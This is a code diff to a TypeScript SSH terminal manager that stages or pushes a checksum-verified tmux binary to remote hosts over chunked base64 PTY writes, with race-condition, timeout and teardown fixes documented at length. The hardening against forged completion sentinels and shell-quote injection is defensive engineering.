+          logError(`[ssh] ${sessionId}: no cached/downloadable tmux archive for arch=${arch} -- falling through to bare launch`)
+          writeClaudeCmd('tmux-stage-fail:download')
+          return
+        }
+        try {
+          const pushCmd = buildTmuxPushCommand({ arch, tarGzBase64: buf.toString('base64'), nonce: sshNonce })
+          const totalLen = pushCmd.length
+          // #242 round-3 MINOR fix: runChunkedWrite's onDone alone can't
+          // tell "all bytes landed" apart from "bailed mid-transfer" (a
+          // respawn replaced the PTY, or a write threw) -- tracking the last
+          // onProgress byte count here is how attemptTmuxPush tells them
+          // apart below, so an ABORTED transfer can be recovered from
+          // (restore echo, drop the partial payload file) instead of being
+          // treated identically to a clean finish.
+          let bytesLanded = 0
+          // #242 round-2 MAJOR fix: onProgress fires once per chunk (~4961
+          // times for a ~1.27 MB payload at WRITE_CHUNK_SIZE=256B) -- forwarding
+          // every call straight to setFlowState/emitSshFlowState would be
+          // ~5000 log lines + ~5000 IPC sends for one push, and that work runs
+          // inside the SAME 12ms per-chunk timer loop the fixed-budget
+          // timeout above is racing. Throttle to one emit per INTEGER percent
+          // change (~100 emits total) -- runChunkedWrite's own per-chunk
+          // contract (pty-chunked-write.test.ts) is untouched; only this
+          // call site's use of it is throttled.
+          let lastPct = -1
+          runChunkedWrite(pushCmd, {
+            write: (slice) => ptyProcess.write(slice),
+            // Same identity-guarded liveness check writeChunked/writeEnvelopeChunked
+            // use -- a respawn replaces ptyProcess under the same sessionId --
+            // PLUS `!pushDone`, so the sentinel timer (armed below, once
+            // every byte has landed) or any other path that resolves this
+            // attempt can stop an in-flight write; see this function's own
+            // doc comment above for the interleaving hazard this closes.
+            // #242 M3 (adversarial review round 5): also gate on `!destroyed`
+            // -- the ptySessions identity check alone is keyed on caller
+            // discipline (killPty deletes the map entry in the SAME
+            // synchronous frame it kills the pty), not on an invariant. A
+            // direct `getSshFlow(id).destroy()` (bypassing killPty) flips
+            // `destroyed` without ever touching the ptySessions map entry,
+            // so the identity check alone would still report "alive" and let
+            // this write land on a flow that has explicitly torn itself down.
+            isAlive: () => ptySessions.get(sessionId)?.ptyProcess === ptyProcess && !pushDone && !destroyed,
+            onProgress: (sent, total) => {
+              bytesLanded = sent
+              const pct = total > 0 ? Math.min(100, Math.floor((sent / total) * 100)) : 100
+              if (pct === lastPct) return
+              lastPct = pct
+              setFlowState('running-setup', `staging tmux ${pct}%`)
+            },
+            onDone: () => {
+              if (pushDone) return
+              // #242 round-3 MINOR fix: runChunkedWrite's contract guarantees
+              // the LAST onProgress call reports `sent === data.length`
+              // exactly on a full, successful write -- anything less means
+              // this attempt bailed before finishing (isAlive went false, or
+              // a write threw). An aborted transfer must not be treated like
+              // a clean finish-then-wait-for-sentinel: the remote is still
+              // sitting at `stty -echo` with up to ~1.27 MB of partial
+              // base64 in $PUSH_ACCUMULATOR_PATH, and arming
+              // PUSH_TIMEOUT_MS on top of that would, 120s later, write the
+              // claude launch command into a no-echo shell with a dangling
+              // temp file still on disk.
+              const completed = bytesLanded === totalLen
+              // #242 M3: same `!destroyed` addition as isAlive above -- a
+              // flow torn down via a direct destroy() call (not killPty)
+              // must not have its recovery/sentinel-arming writes land here
+              // either.
+              const stillLive = ptySessions.get(sessionId)?.ptyProcess === ptyProcess && !destroyed
+              if (!completed) {
+                if (stillLive) {
+                  try {
+                    // #242 finding F2 (adversarial review round 4, MAJOR):
+                    // the last bytes actually delivered are an arbitrary
+                    // mid-line slice of an `echo '<base64...` chunk write --
+                    // the OPENING single quote landed, its CLOSING quote did
+                    // not, so the remote's line discipline is sitting inside
+                    // a still-open string. Writing the recovery text straight
+                    // after that (the pre-fix shape) becomes literal content
+                    // inside that open quote, and so does writeClaudeCmd's
+                    // `claude ...\r` a moment later -- the session hangs at a
+                    // '>' continuation prompt with echo still off instead of
+                    // falling through to the bare launch. Send an interrupt
+                    // as its OWN write FIRST: a Ctrl-C makes the remote
+                    // shell's line discipline discard the dangling partial
+                    // line (the same mechanism as pressing Ctrl-C to abandon
+                    // a half-typed command at an interactive prompt) before
+                    // the recovery command is ever typed, so it lands as
+                    // real, executable shell text.
+                    ptyProcess.write('\x03')
+                    // Restore echo and drop the partial accumulator file --
+                    // best-effort; this recovery write failing is no worse
+                    // than the abort itself, so it falls through to the bare
+                    // launch regardless.
+                    ptyProcess.write(`stty echo 2>/dev/null; rm -f "$${PUSH_ACCUMULATOR_VAR}"\r`)
+                  } catch { /* best-effort recovery; falling through regardless */ }
+                }
+                pushDone = true
+                logError(`[ssh] ${sessionId}: tmux push aborted mid-transfer (${bytesLanded}/${totalLen} bytes) -- falling through to bare launch`)
+                writeClaudeCmd('tmux-push-fail:aborted')
+                return
+              }
+              // Full, clean finish. Only start waiting for the remote's
+              // completion sentinel if this attempt is still open AND the
+              // PTY we just finished writing to is still the live one -- a
+              // session that died mid-transfer already has nothing further
+              // to wait for, and arming a timer that can only ever write
+              // into a stale/replaced PTY would be a new hazard of exactly
+              // the kind this fix closes.
+              if (stillLive) {
+                armPushSentinelTimeout()
+              }
+            },
+          })
+        } catch (err) {
+          pushDone = true
+          logError(`[ssh] ${sessionId}: tmux push command build failed, falling through to bare launch: ${(err as Error)?.message ?? err}`)
+          writeClaudeCmd('tmux-push-fail:build-error')
+        }
+      }).catch((err) => {
+        // #242 finding F4 (adversarial review round 4, MINOR; correction in
+        // round 5, M4): the production resolver (getOrDownloadTmuxArchive) is
+        // fully try/catch'd and can never reject, but `tmuxArchiveResolver`
+        // is an injectable test seam (_setTmuxArchiveResolverForTest) -- a
+        // rejecting resolver here would otherwise be an UNHANDLED REJECTION.
+        // debug-logger.ts's `process.on('unhandledRejection')` handler only
+        // LOGS it and returns -- it does NOT re-throw and cannot kill main;
+        // that re-throw behaviour belongs to the SEPARATE
+        // `process.on('uncaughtException')` handler, which only fires on a
+        // synchronous throw, never on a rejected promise (an earlier version
+        // of this comment conflated the two). This `.catch()` is still worth
+        // having even though nothing here would crash main: without it, a
+        // rejecting resolver leaves this session silently wedged until
+        // DOWNLOAD_TIMEOUT_MS (45s) fires instead of falling through in the
+        // same tick.
+        if (downloadTimeoutHandle) {
+          clearTimeout(downloadTimeoutHandle)
+          downloadTimeoutHandle = null
+        }
+        if (pushDone) return
+        pushDone = true
+        logError(`[ssh] ${sessionId}: tmux archive resolver rejected, falling through to bare launch: ${(err as Error)?.message ?? err}`)
+        writeClaudeCmd('tmux-push-fail:download-error')
+      })
+    }
+
+    /**
+     * Single choke point every setup-completion path (host AND container,
+     * idle-fallback AND prompt-detection, AND a Launch-Claude re-click that
+     * lands on already-completed setup -- see launchClaude's `setupDone`
+     * branch, wired through here in the #242 round-2 fix) now calls instead
+     * of writeClaudeCmd directly. If tier 1/2 already found a tmux binary
+     * (detectedTmuxSource set), or staging already ran once this session,
+     * proceed straight to the claude launch exactly as before #242 tier 3
+     * existed. Otherwise this is the FIRST time we've learned tmux is
+     * missing -- try staging it before giving up and launching bare.
+     */
+    const proceedAfterSetup = () => {
+      if (claudeSent) return
+      // #242 round-3 MINOR fix: the choke point itself had no
+      // staging-in-flight guard -- launchClaude() got one (`if (stagingSent
+      // && !stagingDone) return`) because a second click is an obvious
+      // re-entry path, but proceedAfterSetup is ALSO reached from four other
+      // call sites (idle-fallback after host/container setup, and the
+      // prompt-detection branches further down in onData), each latched only
+      // by its own `setupShellReady`/`containerSetupShellReady` flag -- not
+      // by staging state. Those flags prevent that SPECIFIC site from firing
+      // twice, but nothing stopped a DIFFERENT site (e.g. the container path)
+      // from reaching this function while the host path's staging attempt is
+      // still mid-curl, and falling straight through to writeClaudeCmd()
+      // below. Mirroring launchClaude's guard here means the invariant does
+      // not depend on "host and container setup never both run in one
+      // session" holding forever -- it holds even if that assumption breaks.
+      if (stagingSent && !stagingDone) return
+      // #242 round-3 MAJOR fix: same shape, for the tier-4 push. A tier-4
+      // push can be in flight for up to ~PUSH_TIMEOUT_MS (120s, plus however
+      // long the ~1.27 MB chunked transfer itself takes) while claudeSent is
+      // still false -- reaching proceedAfterSetup during that window (e.g.
+      // via the idle-fallback branches, which are NOT latched by push
+      // state) fell straight through to writeClaudeCmd() below, writing
+      // `claude ...\r` into the PTY while base64 chunk lines were still
+      // arriving and corrupting the in-flight transfer. Only the push's own
+      // sentinel/timeout/build-error handler (not this choke point) may
+      // call writeClaudeCmd from here on while a push is open.
+      if (pushSent && !pushDone) return
+      if (!detectedTmuxSource && !stagingAttempted) {
+        writeTmuxStageCmd()
+        return
+      }
+      writeClaudeCmd()
     }
 
     /**
@@ -735,6 +1783,24 @@ export function spawnPty(
         writePostCommand()
       },
       launchClaude: () => {
+        // #242 round-2 MAJOR fix: tier-3 staging can be in flight for up to
+        // STAGE_TIMEOUT_MS (20s) while claudeSent is still false, a window
+        // that didn't exist pre-#242 (claudeSent used to flip true in the
+        // same tick setup completed). A second Launch-Claude click in that
+        // window used to write a fresh claude command into a PTY that's
+        // mid-curl. No-op until the in-flight attempt's own sentinel/timeout
+        // handler resolves it -- that handler (not a re-click) is the only
+        // thing allowed to call writeClaudeCmd from here on.
+        if (stagingSent && !stagingDone) return
+        // #242 round-3 MAJOR fix: same shape, for the tier-4 push. Without
+        // this, a Launch-Claude click during the ~60-120s tier-4 base64
+        // transfer falls through (inInnerShell false, setupSent true,
+        // setupDone true) straight into the setupDone branch below ->
+        // proceedAfterSetup() -- which the fix just above this one also now
+        // guards, but a defence-in-depth guard at BOTH call sites means the
+        // invariant doesn't depend on proceedAfterSetup being the only path
+        // that can reach writeClaudeCmd while a push is open.
+        if (pushSent && !pushDone) return
         // Two paths depending on whether we already entered the inner
         // shell. Inner shell → container setup + claudeCmd. Host shell
         // (no postCommand or user skipped it) → host setup + claudeCmd.
@@ -747,13 +1813,25 @@ export function spawnPty(
           writeHostSetupCmd()
         } else if (setupDone) {
           // Setup already done from a prior runPostCommand → claude now.
-          writeClaudeCmd()
+          // #242 round-2 MAJOR fix: routed through proceedAfterSetup, not
+          // writeClaudeCmd directly -- pre-#242 this branch was effectively
+          // inert (claudeSent flipped true in the same tick setup
+          // completed), so it never got exercised by tier-3 staging. Left
+          // as a direct writeClaudeCmd() call, this path skipped staging
+          // entirely even when tier 1/2 had reported tmux=none.
+          proceedAfterSetup()
         }
       },
       skip: () => {
         setFlowState('skipped')
       },
       destroy: () => {
+        // #242 finding F3 (adversarial review round 4, MAJOR): flip this
+        // FIRST -- writeClaudeCmd's/writeTmuxStageCmd's write-callbacks
+        // check this flag before ever touching ptyProcess, so they bail
+        // even in the window between this call starting and the
+        // clearTimeout calls below actually running.
+        destroyed = true
         if (setupTimeoutHandle) {
           clearTimeout(setupTimeoutHandle)
           setupTimeoutHandle = null
@@ -761,6 +1839,26 @@ export function spawnPty(
         if (idleFallbackHandle) {
           clearTimeout(idleFallbackHandle)
           idleFallbackHandle = null
+        }
+        // #242 finding F3 (adversarial review round 4, MAJOR): stagingTimeoutHandle
+        // was the one timer on this ladder NOT cleared here -- it outlives
+        // session teardown and, unguarded, drives a full claude-launch write
+        // into the PTY destroy() just tore down (proved: "WRITES AFTER
+        // DESTROY" logged from exactly this timer in the reviewer's probe).
+        // pushTimeoutHandle and downloadTimeoutHandle have the identical
+        // shape (armed, never cleared on teardown), so all three are
+        // cleared together here, next to the two timers that already were.
+        if (stagingTimeoutHandle) {
+          clearTimeout(stagingTimeoutHandle)
+          stagingTimeoutHandle = null
+        }
+        if (pushTimeoutHandle) {
+          clearTimeout(pushTimeoutHandle)
+          pushTimeoutHandle = null
+        }
+        if (downloadTimeoutHandle) {
+          clearTimeout(downloadTimeoutHandle)
+          downloadTimeoutHandle = null
         }
         sshFlows.delete(sessionId)
       },
@@ -813,28 +1911,200 @@ export function spawnPty(
       }
 
       // Step 1 completion sentinel: the remote node script writes
-      // `setup ok\n` to stdout right before exiting. We only treat
-      // sentinels seen AFTER setupSent as completion — otherwise an
-      // earlier sentinel echoed by a previous session in the same
-      // long-running shell could spuriously latch this on connect.
-      if (setupSent && !setupDone && data.includes('setup ok')) {
-        setupDone = true
-        if (setupTimeoutHandle) {
-          clearTimeout(setupTimeoutHandle)
-          setupTimeoutHandle = null
+      // `setup ok <nonce> tmux=<class>\n` to stdout right before exiting.
+      //
+      // #242 findings I1+I2 correction: the completion latch used to be a
+      // bare `data.includes('setup ok')` substring check against the
+      // CURRENT chunk only -- two independent bugs shared that one line.
+      // I2: a write-only attacker (no read access to the tty, so no way to
+      // learn this session's nonce) could feed the literal text "setup ok"
+      // and latch completion early with no usable tmux ever recorded,
+      // silently losing persistence AND forcing an unwanted tier-3 staging
+      // attempt (network fetch + a write into ~/.claude/bin) on a host that
+      // already had tmux. I1: even for a GENUINE sentinel, a real SSH link
+      // routinely splits this line across multiple PTY chunks -- the bare
+      // substring check fired on chunk 1 alone, latching `setupDone` before
+      // the (correctly chunk-boundary-safe) tmux-class parse could ever see
+      // the completed line in chunk 2, so the class was silently lost for
+      // the rest of the session.
+      //
+      // The fix for both: the completion latch is now gated on the SAME
+      // nonce-bearing, chunk-boundary-safe match `parseTmuxSentinel` uses
+      // for the tmux class itself, run against the ACCUMULATED per-session
+      // buffer (`bufferSetupLine`, not just this chunk) -- so a bare/wrong
+      // sentinel can never latch completion at all, and a genuine one
+      // latches exactly once the full line (nonce + resolved class) has
+      // actually arrived, however many chunks that took. We only consider
+      // sentinels seen AFTER setupSent as completion — otherwise an earlier
+      // sentinel echoed by a previous session in the same long-running
+      // shell could spuriously latch this on connect.
+      if (setupSent && !setupDone) {
+        const combined = bufferSetupLine(sessionId, data)
+        const tmuxResult = parseTmuxSentinel(combined, sshNonce)
+        if (tmuxResult !== undefined) {
+          setupDone = true
+          clearSetupLineBuffer(sessionId)
+          // `null` (explicit 'none') CLEARS detected state; a class STAGES
+          // it -- see parseTmuxSentinel's doc comment for why `??` cannot
+          // be used here (adversarial review, #242 MINOR).
+          detectedTmuxSource = tmuxResult === null ? null : (tmuxResult === 'path' ? 'onpath' : 'staged')
+          if (setupTimeoutHandle) {
+            clearTimeout(setupTimeoutHandle)
+            setupTimeoutHandle = null
+          }
+          logInfo(`[ssh] ${sessionId}: host setup ok received (tmux=${tmuxResult ?? 'none'})`)
         }
-        logInfo(`[ssh] ${sessionId}: host setup ok received`)
       }
 
-      // Container setup completion: same sentinel, but we only consider
-      // it after the second setupCmd was written (inside the container).
-      if (containerSetupSent && !containerSetupDone && data.includes('setup ok')) {
-        containerSetupDone = true
-        if (setupTimeoutHandle) {
-          clearTimeout(setupTimeoutHandle)
-          setupTimeoutHandle = null
+      // Container setup completion: same sentinel, same nonce-gated/buffered
+      // latch as the host branch above, but we only consider it after the
+      // second setupCmd was written (inside the container).
+      if (containerSetupSent && !containerSetupDone) {
+        const combined = bufferSetupLine(sessionId, data)
+        const tmuxResult = parseTmuxSentinel(combined, sshNonce)
+        if (tmuxResult !== undefined) {
+          containerSetupDone = true
+          clearSetupLineBuffer(sessionId)
+          detectedTmuxSource = tmuxResult === null ? null : (tmuxResult === 'path' ? 'onpath' : 'staged')
+          if (setupTimeoutHandle) {
+            clearTimeout(setupTimeoutHandle)
+            setupTimeoutHandle = null
+          }
+          logInfo(`[ssh] ${sessionId}: container setup ok received (tmux=${tmuxResult ?? 'none'})`)
         }
-        logInfo(`[ssh] ${sessionId}: container setup ok received`)
+      }
+
+      // #242 tier 4: the arch probe fired alongside writeTmuxStageCmd. Not
+      // gated on stagingDone (arch is useful the instant it's known, and
+      // must be known BEFORE the stage sentinel resolves for
+      // attemptTmuxPush below to ever fire) -- only on stagingSent (the
+      // probe is never sent otherwise) and on !archProbeResolved.
+      //
+      // #242 round-3 MINOR fix: this used to gate on `detectedArch ===
+      // null`, which cannot tell "not yet resolved" apart from "resolved to
+      // an unrecognised combo" -- both leave detectedArch null, so the
+      // regex kept re-running against every later PTY chunk for the rest of
+      // the session, and unrelated later output shaped like the sentinel
+      // could set detectedArch long after the real probe. `archProbeResolved`
+      // latches the FIRST time parseArchProbeSentinel returns anything other
+      // than `undefined` (a real match OR an unrecognised-combo `null`), so
+      // a stray later repeat can never re-parse or overwrite the result.
+      if (stagingSent && !archProbeResolved) {
+        // Parse the accumulated text, not this chunk (#242 I1 round-3): a probe
+        // split across two chunks otherwise leaves detectedArch null and makes
+        // tier 4 unreachable on any link that segments the line.
+        const archResult = parseArchProbeSentinel(bufferSshLine(sessionId, 'arch', data))
+        if (archResult !== undefined) {
+          archProbeResolved = true
+          clearSshLineBuffer(sessionId, 'arch')
+          detectedArch = archResult
+          logInfo(`[ssh] ${sessionId}: tmux tier-4 arch probe resolved -> ${detectedArch ?? 'unrecognised'}`)
+        }
+      }
+
+      // #242 tier 3: the staging fragment's own completion sentinel. Only
+      // considered once writeTmuxStageCmd has actually run (stagingSent)
+      // and only the FIRST match counts (stagingDone) -- same shape as the
+      // setup-ok latches above. `ok path=` sets detectedTmuxSource ='staged'
+      // (so the upcoming writeClaudeCmd wraps in tmux); `fail=<reason>`
+      // surfaces the reason via emitSshFlowState info and leaves
+      // detectedTmuxSource null, so writeClaudeCmd falls through to the unwrapped launch
+      // exactly as it already does for tier 1/2's tmux=none -- UNLESS tier 4
+      // can take over: reason is specifically 'download' (no egress, the
+      // one failure mode tier 4 exists for) AND the arch probe above already
+      // resolved a recognised arch. Any other reason (arch/digest/extract/
+      // terminfo/timeout/build-error/unsafe-path), or an unknown arch,
+      // behaves exactly as it did before tier 4 existed.
+      if (stagingSent && !stagingDone) {
+        // Accumulated text, not this chunk (#242 I1 round-3) -- a split
+        // `ok path=` otherwise never resolves and the flow stalls to the 20s
+        // STAGE_TIMEOUT, silently losing tmux on exactly the tiers a
+        // tmux-less remote depends on.
+        const stageResult = parseTmuxStageSentinel(bufferSshLine(sessionId, 'stage', data), sshNonce)
+        if (stageResult !== undefined) {
+          stagingDone = true
+          clearSshLineBuffer(sessionId, 'stage')
+          if (stagingTimeoutHandle) {
+            clearTimeout(stagingTimeoutHandle)
+            stagingTimeoutHandle = null
+          }
+          if (stageResult.ok) {
+            detectedTmuxSource = 'staged' // tier 3 staged this path
+            logInfo(`[ssh] ${sessionId}: tmux staged ok -> ${stageResult.path}`)
+            // #242 finding F3 (MAJOR, adversarial review round 5): patch the
+            // ALREADY-WRITTEN settings-<safeSid>.json's CCC_TMUX_BIN before
+            // the claude launch write below -- see buildTmuxBinPatchCommand's
+            // doc comment (ssh-shim.ts) for why this is required (tiers 3/4
+            // run strictly after configureRemoteSettings baked in the
+            // tier-1/2 probe result, which is empty on exactly the hosts
+            // tier 3 exists to serve). Deliberately NOT passed
+            // `stageResult.path` (#242 finding F1(a), round-2 correction) --
+            // buildTmuxBinPatchCommand computes the fixed
+            // `$HOME/.claude/bin/tmux` location on the REMOTE, at the same
+            // trust boundary buildTmuxLaunchCommand's STAGED_TMUX_BIN_EXPR
+            // uses, rather than trusting this wire-reported value. Best-
+            // effort: a failed/throwing write here must not block the claude
+            // launch that follows -- the statusline degrading is strictly
+            // better than the session never launching at all.
+            try {
+              ptyProcess.write(buildTmuxBinPatchCommand(sessionId) + '\r')
+            } catch (err) {
+              logError(`[ssh] ${sessionId}: tmux CCC_TMUX_BIN settings patch failed to send (statusline may not reflect tmux): ${(err as Error)?.message ?? err}`)
+            }
+            writeClaudeCmd()
+          } else if (stageResult.reason === 'download' && detectedArch) {
+            logInfo(`[ssh] ${sessionId}: tmux staging failed (download, no egress) -- attempting tier-4 push instead`)
+            attemptTmuxPush(detectedArch)
+          } else {
+            logInfo(`[ssh] ${sessionId}: tmux staging failed (${stageResult.reason}) -- falling back to bare launch`)
+            // #242 round-2 MINOR fix: pass the reason straight to
+            // writeClaudeCmd rather than calling
+            // setFlowState('running-setup', `tmux-stage-fail:...`) here --
+            // that call was immediately overwritten in the same tick by
+            // writeClaudeCmd's own setFlowState('running-claude'), so a
+            // renderer watching current state only ever saw the LATER
+            // state with no reason attached.
+            writeClaudeCmd(`tmux-stage-fail:${stageResult.reason}`)
+          }
+          return
+        }
+      }
+
+      // #242 tier 4: the push's own completion sentinel -- reuses the EXACT
+      // same parser and sentinel shape as tier 3 (buildTmuxPushControlScript
+      // emits the identical `ccc-tmux-stage ok/fail` text), so pty-manager
+      // needs no second parser. Gated on pushSent/pushDone the same way the
+      // tier-3 block above is gated on stagingSent/stagingDone.
+      if (pushSent && !pushDone) {
+        // Accumulated text, not this chunk (#242 I1 round-3). Reuses the
+        // 'stage' buffer deliberately: tier 4 only runs after tier 3 has
+        // resolved and cleared it, and both emit the identical sentinel shape,
+        // so there is no interleaving to keep apart between these two.
+        const pushResult = parseTmuxStageSentinel(bufferSshLine(sessionId, 'stage', data), sshNonce)
+        if (pushResult !== undefined) {
+          pushDone = true
+          clearSshLineBuffer(sessionId, 'stage')
+          if (pushTimeoutHandle) {
+            clearTimeout(pushTimeoutHandle)
+            pushTimeoutHandle = null
+          }
+          if (pushResult.ok) {
+            detectedTmuxSource = 'staged' // tier 4 staged this path
+            logInfo(`[ssh] ${sessionId}: tmux pushed ok -> ${pushResult.path}`)
+            // #242 finding F3: same CCC_TMUX_BIN patch as the tier-3 ok
+            // branch above -- see that branch's comment.
+            try {
+              ptyProcess.write(buildTmuxBinPatchCommand(sessionId) + '\r')
+            } catch (err) {
+              logError(`[ssh] ${sessionId}: tmux CCC_TMUX_BIN settings patch failed to send (statusline may not reflect tmux): ${(err as Error)?.message ?? err}`)
+            }
+            writeClaudeCmd()
+          } else {
+            logInfo(`[ssh] ${sessionId}: tmux push failed (${pushResult.reason}) -- falling back to bare launch`)
+            writeClaudeCmd(`tmux-push-fail:${pushResult.reason}`)
+          }
+          return
+        }
       }
 
       // Auto-type SSH password only on a real password prompt, not any MOTD
@@ -901,7 +2171,7 @@ export function spawnPty(
       // claude is the only sensible next stage.
       if (setupSent && setupDone && !setupShellReady && sawShellPrompt) {
         setupShellReady = true
-        if (!claudeSent) writeClaudeCmd()
+        if (!claudeSent) proceedAfterSetup()
         return
       }
 
@@ -931,7 +2201,7 @@ export function spawnPty(
         && sawShellPrompt
       ) {
         containerSetupShellReady = true
-        writeClaudeCmd()
+        proceedAfterSetup()
       }
     })
   } else if ((options?.provider ?? 'claude') === 'codex' && !options?.shellOnly) {
@@ -1791,6 +3061,14 @@ function cleanupSessionResources(sessionId: string): void {
   pendingWrites.delete(sessionId)
   recentWrites.delete(sessionId)
   sshOscBuffers.delete(sessionId)
+  // #242 finding I1: drop ALL of this session's sentinel buffers alongside its
+  // OSC sibling above -- same per-session-map shape, same leak risk if omitted.
+  // All three kinds, not just 'setup': a session can die with its stage or arch
+  // sentinel still unresolved, and a per-kind clear only runs on resolve.
+  clearAllSshLineBuffers(sessionId)
+  // #242 finding F1 (b): drop this session's nonce so it can never leak into
+  // a future, unrelated spawn reusing the same sessionId.
+  sshNonceBySession.delete(sessionId)
   pasteQueues.get(sessionId)?.cancel() // stop draining + drop pending before dropping the ref (P1.5)
   pasteQueues.delete(sessionId)
   // Delete the per-session statusline status file so the watcher's poll

--- a/src/main/ssh-args.ts
+++ b/src/main/ssh-args.ts
@@ -63,6 +63,17 @@ export function buildSshArgs(ssh: SshArgsTarget, mcpPort: number, platform: Node
     '-p', String(ssh.port),
     '-t', // force TTY allocation
     '-o', 'StrictHostKeyChecking=accept-new',
+    // #242: tmux persistence only helps if the underlying connection
+    // eventually notices it's dead. Laptop sleep, wifi roaming and NAT
+    // idle-timeouts can kill a TCP connection while the local socket still
+    // looks open, and ssh has no way to detect that without probing.
+    // ServerAliveInterval=30 sends an encrypted keepalive every 30s;
+    // ServerAliveCountMax=3 gives up after 3 unanswered probes (~90s) so a
+    // truly dead connection surfaces (and CCC's reconnect can take over)
+    // instead of hanging indefinitely. All platforms — unlike ControlMaster
+    // below, keepalive has no Windows-vs-Unix incompatibility.
+    '-o', 'ServerAliveInterval=30',
+    '-o', 'ServerAliveCountMax=3',
   ]
 
   if (platform === 'win32') {

--- a/src/main/ssh-tmux-push.ts
+++ b/src/main/ssh-tmux-push.ts
@@ -1,0 +1,438 @@
+/**
+ * ssh-tmux-push.ts — pure builder for tier 4 of the #242 tmux-detection
+ * ladder: pushing a pre-downloaded, sha256-verified tmux static build down
+ * an ALREADY-OPEN SSH PTY as base64, for remotes tier 3 (ssh-tmux-stage.ts)
+ * could not reach because they have NO outbound network egress at all —
+ * the archive travels over the SSH tunnel that is already open (local ->
+ * remote), never touching the remote's own network stack, which is exactly
+ * why this tier works where curl/wget cannot. The host-side download/cache
+ * (fetching the archive once into `app.getPath('userData')/tmux-cache/` and
+ * reusing it thereafter) is pty-manager.ts's job — this module only builds
+ * the shell text pty-manager writes once it already has the verified bytes
+ * in hand, mirroring the ssh-tmux.ts / ssh-tmux-stage.ts pattern: a
+ * dependency-free string builder so the exact shell fragment is
+ * unit-testable without the pty-manager dependency graph.
+ *
+ * Reuses ssh-tmux-stage.ts's `TmuxStageTarget` type, its per-arch
+ * `TMUX_STAGE_SHA256` digests (the archive bytes pushed here are
+ * byte-for-byte the same v3.7b release asset tier 3 would have downloaded,
+ * so the SAME digest applies), and its `TMUX_STAGE_SENTINEL_PREFIX`
+ * (`ccc-tmux-stage ok/fail`) — pty-manager's existing
+ * `parseTmuxStageSentinel` handles BOTH tiers' completion sentinel with
+ * zero new parsing code.
+ *
+ * Exports:
+ *   - `chunkBase64()` — splits a base64 string into PUSH_B64_LINE_MAX-sized
+ *     lines. Exported so the max-line-length invariant is testable
+ *     directly, not only against buildTmuxPushLines' embedded default.
+ *   - `buildTmuxPushControlScript()` / `buildTmuxPushLines()` — the ordered
+ *     list of discrete shell command LINES to write to the PTY, each one
+ *     meant to land as its own '\r'-terminated write. Readable text (except
+ *     the final control line, which is base64-wrapped for the same
+ *     echo-immunity reason buildTmuxStageCommand's whole payload is), for
+ *     structural unit tests to assert against.
+ *   - `buildTmuxPushCommand()` — all of the above joined into the single
+ *     string pty-manager actually feeds through `runChunkedWrite`
+ *     (pty-chunked-write.ts) — NOT a single `ptyProcess.write()` the way
+ *     buildTmuxStageCommand is, because this payload cannot safely be a
+ *     single base64-wrapped line — see PUSH_B64_LINE_MAX's doc comment.
+ *   - `buildArchProbeCommand()` / `buildArchProbeCommandBracketed()` /
+ *     `parseArchProbeSentinel()` / `mapUnameToTarget()` — pty-manager needs
+ *     to know the REMOTE's arch BEFORE it can pick which cached archive to
+ *     push, and tier 3's `fail=download` sentinel never carries it (the
+ *     download failed before its own `uname` result was ever reported) — so
+ *     tier 4 runs a second, tiny `uname -s`/`uname -m` probe of its own
+ *     (bracketed in `stty -echo`/`stty echo` by the Bracketed variant, #242
+ *     round-3 MINOR fix). `mapUnameToTarget` re-expresses the SAME four-way
+ *     combo table `buildTmuxStageScript` embeds as remote shell text
+ *     (ssh-tmux-stage.ts) as a callable TS function, since the HOST side,
+ *     not the remote, needs to interpret the result — ssh-tmux-push.test.ts
+ *     parses the remote `case`/`esac` text back out and asserts the two
+ *     tables agree combo-for-combo (#242 round-3 MINOR fix), so they cannot
+ *     silently drift apart the way two independently hand-typed copies
+ *     could.
+ *
+ * No default export (project convention).
+ */
+
+import { TMUX_STAGE_SHA256, TMUX_STAGE_SENTINEL_PREFIX, assertSafeNonce, type TmuxStageTarget } from './ssh-tmux-stage'
+
+export { TMUX_STAGE_SENTINEL_PREFIX }
+export type { TmuxStageTarget }
+
+/**
+ * Max base64 characters per pushed line, counting ONLY the base64 payload
+ * (the surrounding `echo '…' >> <path>` wrapper adds a bounded, small
+ * constant on top — see the line-length test in ssh-tmux-push.test.ts,
+ * which asserts against the FULL line, not just this constant).
+ *
+ * Must stay comfortably under the Linux tty line discipline's
+ * canonical-mode input buffer (historically 4096 bytes — `N_TTY_BUF_SIZE`
+ * / the old `MAX_CANON`). A SINGLE typed line longer than that limit is
+ * silently truncated by the KERNEL before the shell ever reads it — this is
+ * not a cosmetic echo/readability concern the way a long line in
+ * buildTmuxStageCommand's single base64 blob is (that one is base64-decoded
+ * in one shot server-side by `base64 -d`, so ITS length is bounded only by
+ * ARG_MAX-via-`echo`, not by canonical-mode line buffering — but it is also
+ * a ~2KB script, nowhere near this scale). A full tmux static build is
+ * ~1.27 MB of base64 once encoded; a single line that size would be nowhere
+ * close to safe on ANY remote tty. Splitting into many bounded lines (each
+ * its own PTY write, terminated by '\r' so the remote shell executes it as
+ * a discrete command) is what makes tier 4 viable at all — acceptance (c)
+ * exists specifically to catch a future "send it in one write" regression
+ * that would silently corrupt (truncate) the transferred archive on any
+ * remote with a standard canonical-mode tty.
+ */
+export const PUSH_B64_LINE_MAX = 2000
+
+/**
+ * Base64 alphabet guard (#242 round-2 MAJOR fix). `buildTmuxPushLines`
+ * interpolates `input.tarGzBase64` into single-quoted remote shell text
+ * (`echo '<chunk>' >> "$…"`) — a single `'` anywhere in that string closes
+ * the quote early and everything after it becomes remote shell code
+ * executed as the SSH user. Today's only caller passes
+ * `buf.toString('base64')`, which can never contain one, so no exploit
+ * exists in this diff — but this module is exported, pure, and documented
+ * as reusable (mirrors why `SAFE_TMUX_BIN_RE` in ssh-tmux.ts is re-applied
+ * inside `parseTmuxStageSentinel` rather than trusted to its one caller —
+ * this repo's own convention is to re-guard at the boundary, not rely on
+ * "the only caller happens to be safe"; see #188/#241 for the two prior
+ * times a remote-facing string-interpolation boundary shipped without one).
+ * Exported so callers/tests can probe the exact charset this module trusts.
+ */
+export const SAFE_B64_RE = /^[A-Za-z0-9+/]*={0,2}$/
+
+// Remote paths, $$-suffixed like the tier-3 stage script's temp files so two
+// concurrent push sessions to the same host can't clobber each other's
+// in-progress upload (same reasoning as ssh-tmux-stage.ts's `.ccc-tmux-stage.$$`).
+//
+// #242 round-2 BLOCKER fix: PUSH_TMP_B64_PATH is written by the INTERACTIVE
+// remote shell (the one the chunk lines below are typed into — call it PID
